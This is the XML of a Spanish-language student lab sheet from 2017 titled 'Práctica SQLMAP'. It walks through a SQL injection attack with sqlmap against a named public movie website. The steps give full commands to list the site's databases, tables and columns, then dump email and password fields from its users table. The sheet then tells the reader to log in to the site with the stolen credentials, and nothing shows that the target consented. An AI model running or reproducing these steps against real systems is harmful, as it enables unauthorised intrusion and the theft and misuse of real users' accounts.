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Práctica SQLMAP</w:t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3 de febrero de 2017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arla Lorena Flores Subias A01331363</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t>A01331363@itesm.mx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Objetivo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objetivo de esta práctica es realizar un ataque básico de sql inyection utilizando sqlmap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Metodologí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Ingresa a Kali y abre la termi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Escribe sqlmap para verificar que la herramienta esta instalad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Ingresa a</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> http://www.altcine.com/movie.php?id=391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grega ‘ al final de la dirección para generar un error de SQ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Vuelve a la terminal y escribe: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sqlmap –u http://www.altcine.com/movie.php?id=3914 --dbs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(presiona y para las opciones que te aparezcan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l finalizar te mostrará las bases de datos disponibles. Escribe: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sqlmap -u </w:t>
      </w:r>
      <w:hyperlink r:id="rId2">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:b/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="es-MX"/>
          </w:rPr>
          <w:t>http://www.altcine.com/movie.php?id=3914</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> -D altcine_mems --tables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ara obtener las tablas de la base de da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hora escribe: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sqlmap -u http://www.altcine.com/movie.php?id=3914 -D altcine_mems -T users –columns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ara obtener las columnas de la tab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Una vez hecho esto, obtendremos información de la tabla, para esto escribe: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sqlmap -u http://www.altcine.com/movie.php?id=3914 -D altcine_mems -T users -C email,password --dump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En las opciones que te aparece oprime “Y” y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Selecciona alguno de los emails y password que te devolvió la herramien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es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve">Ingresa a </w:t>
      </w:r>
      <w:hyperlink r:id="rId3">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="InternetLink"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:lang w:val="es-MX"/>
          </w:rPr>
          <w:t>www.altcine.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:val="es-MX"/>
        </w:rPr>
        <w:t xml:space="preserve"> y trata de iniciar sesión con el correo y contraseña seleccionados.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:ind w:left="720" w:hanging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s-MX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cine.com/movie.php?id=3914" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.altcin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23:45:00Z</dcterms:created>
  <dc:creator>Roberto Gómez Cárdenas</dc:creator>
  <dc:description/>
  <cp:keywords/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>Carla Lorena Flores Subias</cp:lastModifiedBy>
  <cp:lastPrinted>2004-01-14T14:21:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-02-03T02:35:00Z</dcterms:modified>
  <cp:revision>20</cp:revision>
  <dc:subject/>
  <dc:title>Formato impresiones de programas</dc:title>
</cp:coreProperties>
</file>